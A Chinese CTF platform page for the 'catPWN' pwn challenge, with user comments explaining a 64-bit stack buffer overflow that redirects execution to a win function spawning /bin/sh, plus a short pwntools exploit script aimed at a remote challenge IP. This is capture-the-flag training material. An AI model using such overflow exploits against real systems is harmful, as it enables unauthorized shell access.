catPWN 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: zhangqr
一血奖励: 0金币
解  决: 37
提  示:
描  述:
wctf{}
其  他: 下载
评论
nil126 4月前

ida中打开,64位的程序,发现一个128长度的buffer有堆栈溢出漏洞;还有一个win函数,里面有一条执行/bin/sh的指令,指令地址是0x4011CA。接下来要做的就是构造一个128+8+8字节长度的payload,128字节填充buffer,8字节填充执行gets时压栈的buffer指针,最后8字节写int64(0x4011CA)即下条指令位置。 调用gets时堆栈状态: |----

回复 1

dongwenjia 9月前

这题真恶心,要不是kali报错,我都不知道我pwn进去了,打通之后ls查看没内容,必须cat flag,什么都没显示出来后,在输入ls才看到flag,我真服了,还不是根目录。

回复 2
怪我喽 9月前

哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

回复 0

怪我喽 9月前

from pwn import* io = remote('82.157.146.43',?) payload=b'p'*0x88+p64(0x4011CA) io.send(payload) io.interactive() 用这个程序肯定没问题,就看你在kali中怎么执行操作了。这题真勾八

回复 2

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

EtHat 攻破了该题 13天前
sumql 攻破了该题 20天前
0x00dream 攻破了该题 1月前
hanzj 攻破了该题 1月前
t1tl3d 攻破了该题 1月前
倦鸟叫了一整天 攻破了该题 2月前
fanshaoze 攻破了该题 2月前
jhinjax 攻破了该题 2月前
Rahn 攻破了该题 2月前
oceanpeak 攻破了该题 2月前
time284 攻破了该题 3月前
nil126 攻破了该题 4月前
lyzlyslyc 攻破了该题 4月前
jiangjx 攻破了该题 5月前
NEOYZC 攻破了该题 5月前
ctfer1x1 攻破了该题 6月前
amobaishi 攻破了该题 6月前
M9M9 攻破了该题 6月前
yih0118 攻破了该题 7月前
1hon 攻破了该题 8月前
问题反馈